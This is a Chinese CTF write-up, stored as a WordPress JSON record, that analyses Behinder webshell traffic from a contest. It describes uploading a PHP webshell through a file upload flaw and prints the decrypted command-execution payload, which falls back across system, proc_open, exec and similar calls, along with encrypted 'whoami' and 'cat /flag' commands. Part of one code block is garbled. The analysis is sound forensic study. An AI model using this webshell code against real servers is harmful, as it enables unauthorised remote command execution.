{"id":1136,"date":"2026-04-18T18:50:32","date_gmt":"2026-04-18T10:50:32","guid":{"rendered":"http:\/\/shr1mp.top\/?p=1136"},"modified":"2026-04-18T19:47:39","modified_gmt":"2026-04-18T11:47:39","slug":"%e6%95%b0%e5%ad%97%e4%b8%ad%e5%9b%bd%e5%88%9b%e6%96%b0%e5%a4%a7%e8%b5%9b%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%ad%90%e8%b5%9b%e9%81%93%ef%bc%88%e6%a1%83%e6%9d%8e%e7%bb%84%ef%bc%89-%e5%86%b0","status":"publish","type":"post","link":"http:\/\/shr1mp.top\/index.php\/2026\/04\/18\/%e6%95%b0%e5%ad%97%e4%b8%ad%e5%9b%bd%e5%88%9b%e6%96%b0%e5%a4%a7%e8%b5%9b%e7%bd%91%e7%bb%9c%e5%ae%89%e5%85%a8%e5%ad%90%e8%b5%9b%e9%81%93%ef%bc%88%e6%a1%83%e6%9d%8e%e7%bb%84%ef%bc%89-%e5%86%b0\/","title":{"rendered":"\u6570\u5b57\u4e2d\u56fd\u521b\u65b0\u5927\u8d5b\u7f51\u7edc\u5b89\u5168\u5b50\u8d5b\u9053\uff08\u6843\u674e\u7ec4\uff09&#8212;-\u51b0\u78a7\u874e"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\" id=\"\u51b0\u874e\u7b80\u8ff0\">\u51b0\u874e\u7b80\u8ff0\uff1a<\/h2>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/origin.picgo.net\/2026\/04\/12\/-2026-04-12-154248da0f4c7d5f26e10e.png\" alt=\"\"\/><\/figure>\n\n\n\n<p id=\"\u2460\u9996\u6b21\u8fde\u63a5webshell\u65f6-\u5ba2\u6237\u7aef\u9996\u5148\u5411\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u4e00\u4e2aget\u8bf7\u6c42\">\u9996\u6b21\u8fde\u63a5webshell\u65f6\uff0c\u5ba2\u6237\u7aef\u9996\u5148\u5411\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u4e00\u4e2aGET\u8bf7\u6c42<\/p>\n\n\n\n<p id=\"\u2461\u670d\u52a1\u5668\u7aef\u968f\u673a\u4ea7\u751f\u4e00\u4e2a16\u4f4d\u7684\u5bc6\u94a5-\u628a\u5bc6\u94a5\u56de\u663e\u7ed9\u5ba2\u6237\u7aef-\u540c\u65f6\u628a\u5bc6\u94a5\u5199\u8fdb\u670d\u52a1\u5668\u4fa7\u7684session\u4e2d\">\u670d\u52a1\u5668\u7aef\u968f\u673a\u4ea7\u751f\u4e00\u4e2a16\u4f4d\u7684\u5bc6\u94a5\uff0c\u628a\u5bc6\u94a5\u56de\u663e\u7ed9\u5ba2\u6237\u7aef\uff0c\u540c\u65f6\u628a\u5bc6\u94a5\u5199\u8fdb\u670d\u52a1\u5668\u4fa7\u7684Session\u4e2d<\/p>\n\n\n\n<p id=\"\u2462\u5ba2\u6237\u7aef\u83b7\u53d6\u5bc6\u94a5\u540e-\u5bf9\u4e8c\u8fdb\u5236payload\u5148\u8fdb\u884caes\u52a0\u5bc6-\u672c\u5730openssl\u6a21\u5757-\u518d\u901a\u8fc7post\u65b9\u5f0f\u53d1\u9001\u81f3\u670d\u52a1\u5668\u7aef\">\u5ba2\u6237\u7aef\u83b7\u53d6\u5bc6\u94a5\u540e\uff0c\u5bf9\u4e8c\u8fdb\u5236payload\u5148\u8fdb\u884cAES\u52a0\u5bc6\uff08\u672c\u5730openssl\u6a21\u5757\uff09\uff0c\u518d\u901a\u8fc7POST\u65b9\u5f0f\u53d1\u9001\u81f3\u670d\u52a1\u5668\u7aef<\/p>\n\n\n\n<p id=\"\u2463\u670d\u52a1\u5668\u6536\u5230\u6570\u636e\u540e-\u4ecesession\u4e2d\u53d6\u51fa\u5bc6\u94a5-\u8fdb\u884caes\u89e3\u5bc6-\u89e3\u5bc6\u4e4b\u540e\u5f97\u5230\u4e8c\u8fdb\u5236payload\u6570\u636e\">\u670d\u52a1\u5668\u6536\u5230\u6570\u636e\u540e\uff0c\u4eceSession\u4e2d\u53d6\u51fa\u5bc6\u94a5\uff0c\u8fdb\u884cAES\u89e3\u5bc6\uff0c\u89e3\u5bc6\u4e4b\u540e\u5f97\u5230\u4e8c\u8fdb\u5236payload\u6570\u636e<\/p>\n\n\n\n<p id=\"\u2464\u670d\u52a1\u5668\u89e3\u6790\u4e8c\u8fdb\u5236payload\u6587\u4ef6-\u6267\u884c\u4efb\u610f\u4ee3\u7801-\u5e76\u5c06\u6267\u884c\u7ed3\u679c\u52a0\u5bc6\u8fd4\u56de\">\u670d\u52a1\u5668\u89e3\u6790\u4e8c\u8fdb\u5236payload\u6587\u4ef6\uff0c\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u5e76\u5c06\u6267\u884c\u7ed3\u679c\u52a0\u5bc6\u8fd4\u56de<\/p>\n\n\n\n<h2 class=\"wp-block-heading\" id=\"\u505a\u9898\">\u505a\u9898<\/h2>\n\n\n\n<p>\u5229\u7528\u6587\u4ef6\u4e0a\u4f20\u6f0f\u6d1e\u8fdb\u884c\u51b0\u874ewebshell\u690d\u5165<\/p>\n\n\n\n<p>\u6d415\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/origin.picgo.net\/2026\/04\/18\/-2026-04-18-1913195d497f658c0e3b36.png\" alt=\"\"\/><\/figure>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510\n\u2502                     \u653b\u51fb\u6d41\u7a0b                                 \u2502\n\u251c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2524\n\u2502 1\ufe0f  \u4e0a\u4f20\u6076\u610f\u6587\u4ef6                                              \u2502\n\u2502     POST \/index.php (\u5305\u542b dcic.php)                         \u2502\n\u2502                                                             \u2502\n\u2502 2\ufe0f  \u670d\u52a1\u5668\u4fdd\u5b58\u6587\u4ef6                                            \u2502\n\u2502     \u4fdd\u5b58\u5230\uff1a\/uploads\/dcic.php \u6216 \/images\/dcic.php            \u2502\n\u2502                                                             \u2502\n\u2502 3\ufe0f  \u8bbf\u95ee WebShell                                            \u2502\n\u2502     GET http:\/\/10.30.16.146\/uploads\/dcic.php                \u2502\n\u2502                                                             \u2502\n\u2502 4\ufe0f  \u53d1\u9001\u52a0\u5bc6\u547d\u4ee4                                              \u2502\n\u2502     POST \/uploads\/dcic.php                                  \u2502\n\u2502     Body: AES128_Encrypt(\"system|<!--?php system('whoami'); ?-->\")\u2502\n\u2502                                                             \u2502\n\u2502 5\ufe0f  \u670d\u52a1\u5668\u6267\u884c\u547d\u4ee4                                            \u2502\n\u2502     \u89e3\u5bc6 \u2192 eval() \u6267\u884c \u2192 \u8fd4\u56de\u7ed3\u679c                            \u2502\n\u2502                                                             \u2502\n\u2502 6\ufe0f  \u83b7\u53d6 Flag                                                 \u2502\n\u2502     \u53d1\u9001\uff1aAES128_Encrypt(\"system|<!--?php system('cat \/flag*'); ?-->\")\u2502\n\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<\/code><\/pre>\n\n\n\n<p>\u8fd9\u9053\u9898\u7684\u51b0\u874e\uff08v2\uff09\u7279\u5f81\uff1a<\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>AES-128\u52a0\u5bc6\u4e14\u5bc6\u94a5\u56fa\u5b9a16\u5b57\u8282<\/li>\n\n\n\n<li>XOR\u56de\u9000<\/li>\n\n\n\n<li>Session\u5bc6\u94a5<\/li>\n\n\n\n<li>\u6709\u547d\u4ee4\u5206\u9694\u7b26\u201c|\u201d<\/li>\n<\/ul>\n\n\n\n<p>\u6b64\u5904\u76f4\u63a5\u7528PZ\u8fdb\u884c\u89e3\u5bc6<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img decoding=\"async\" src=\"https:\/\/origin.picgo.net\/2026\/04\/18\/-2026-04-18-1833192ba932daeed15efc.png\" alt=\"\"\/><\/figure>\n\n\n\n<p>\u6d4114\uff1a\uff08\u5185\u5c42base64\u89e3\u7801\u540e\uff1b\uff09<\/p>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>@error_reporting(0);\n\nfunction getSafeStr($str){\n    $s1 = iconv('utf-8','gbk\/\/IGNORE',$str);\n    $s0 = iconv('gbk','utf-8\/\/IGNORE',$s1);\n    if($s0 == $str){\n        return $s0;\n    }else{\n        return iconv('gbk','utf-8\/\/IGNORE',$str);\n    }\n}\nfunction main($cmd,$path)\n{\n    @set_time_limit(0);\n    @ignore_user_abort(1);\n    @ini_set('max_execution_time', 0);\n    $result = array();\n    $PadtJn = @ini_get('disable_functions');\n    if (! empty($PadtJn)) {\n        $PadtJn = preg_replace('\/&#91;, ]+\/', ',', $PadtJn);\n        $PadtJn = explode(',', $PadtJn);\n        $PadtJn = array_map('trim', $PadtJn);\n    } else {\n        $PadtJn = array();\n    }\n    $c = $cmd;\n    if (FALSE !== strpos(strtolower(PHP_OS), 'win')) {\n        $c = $c . \" 2&gt;&amp;1\\n\";\n    }\n    $JueQDBH = 'is_callable';\n    $Bvce = 'in_array';\n    if ($JueQDBH('system') and ! $Bvce('system', $PadtJn)) {\n        ob_start();\n        system($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('proc_open') and ! $Bvce('proc_open', $PadtJn)) {\n        $handle = proc_open($c, array(\n            array(\n                'pipe',\n                'r'\n            ),\n            array(\n                'pipe',\n                'w'\n            ),\n            array(\n                'pipe',\n                'w'\n            )\n        ), $pipes);\n        $kWJW = NULL;\n        while (! feof($pipes&#91;1])) {\n            $kWJW .= fread($pipes&#91;1], 1024);\n        }\n        @proc_close($handle);\n    } else if ($JueQDBH('passthru') and ! $Bvce('passthru', $PadtJn)) {\n        ob_start();\n        passthru($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {\n        $kWJW = shell_exec($c);\n    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {\n        $kWJW = array();\n        exec($c, $kWJW);\n        $kWJW = join(chr(10), $kWJW) . chr(10);\n    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {\n        $fp = popen($c, 'r');\n        $kWJW = NULL;\n        if (is_resource($fp)) {\n            while (! feof($fp)) {\n                $kWJW .= fread($fp, 1024);\n            }\n        }\n        @pclose($fp);\n    } else {\n        $kWJW = 0;\n        $result&#91;\"status\"] = base64_encode(\"fail\");\n        $result&#91;\"msg\"] = base64_encode(\"none of proc_open\/passthru\/shell_exec\/exec\/exec is available\");\n        $key = $_SESSION&#91;'k'];\n        echo encrypt(json_encode($result));\n        return;\n        \n    }\n    $result&#91;\"status\"] = base64_encode(\"success\");\n    $result&#91;\"msg\"] = base64_encode(getSafeStr($kWJW));\n    echo encrypt(json_encode($result));\n}\n\n\n\uff08\u4e0d\u77e5\u9053\u4e3a\u5565\uff0c\u8fd9\u4e2a\u4ee3\u7801\u5728\u6b64\u5904\u8001\u662f\u8981\u65ad\u5f00\uff09<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code has-small-font-size\"><code>function Encrypt($data)\n{\n @session_start();\n    $key = $_SESSION&#91;'k'];\n\tif(!extension_loaded('openssl'))\n    \t{\n    \t\tfor($i=0;$i<strlen($data);$i++) {=\"\" $data&#91;$i]=\"$data&#91;$i]^$key&#91;$i+1&amp;15];\" }=\"\" return=\"\" $data;=\"\" else=\"\" openssl_encrypt($data,=\"\" \"aes128\",=\"\" $key);=\"\" $cmd=\"Y2QgL3Zhci93d3cvaHRtbC91cGxvYWQvIDtlY2hvIDJpOVE4QXRGRXV6WUh4d2NVbXBqRkNRY2hVZDFRcXdRTWY4bVdmdlV3bTlMRThVYUtWWURUYXE1dEcgPiBmZmZmZmYxMTFhRyAmJiBscw==\" ;$cmd=\"base64_decode($cmd);$path=&quot;L3Zhci93d3cvaHRtbC91cGxvYWQv&quot;;$path=base64_decode($path);\" main($cmd,$path);<=\"\" code=\"\"><\/strlen($data);$i++)><\/code><\/pre>\n\n\n\n<p>base64\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \/var\/www\/html\/upload\/ ;echo 2i9Q8AtFEuzYHxwcUmpjFCQchUd1QqwQMf8mWfvUwm9LE8UaKVYDTaq5tG &gt; ffffff111aG &amp;&amp; ls<\/code><\/pre>\n\n\n\n<p>base58\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>flag{dbeeed36-0d7e-211a-69db-66bd74ea91d5}<\/code><\/pre>\n","protected":false},"excerpt":{"rendered":"<p>\u51b0\u874e\u7b80\u8ff0\uff1a \u9996\u6b21\u8fde\u63a5webshell\u65f6\uff0c\u5ba2\u6237\u7aef\u9996\u5148\u5411\u670d\u52a1\u5668\u7aef\u53d1\u8d77\u4e00\u4e2aGET\u8bf7\u6c42 \u670d\u52a1\u5668\u7aef\u968f\u673a\u4ea7\u751f\u4e00\u4e2a16\u4f4d\u7684\u5bc6\u94a5\uff0c\u628a\u5bc6\u94a5\u56de\u663e\u7ed9\u5ba2\u6237 &#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_gspb_post_css":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[9],"tags":[],"class_list":["post-1136","post","type-post","status-publish","format-standard","hentry","category-misc"],"_links":{"self":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1136","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/comments?post=1136"}],"version-history":[{"count":10,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1136\/revisions"}],"predecessor-version":[{"id":1213,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/1136\/revisions\/1213"}],"wp:attachment":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media?parent=1136"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/categories?post=1136"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/tags?post=1136"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}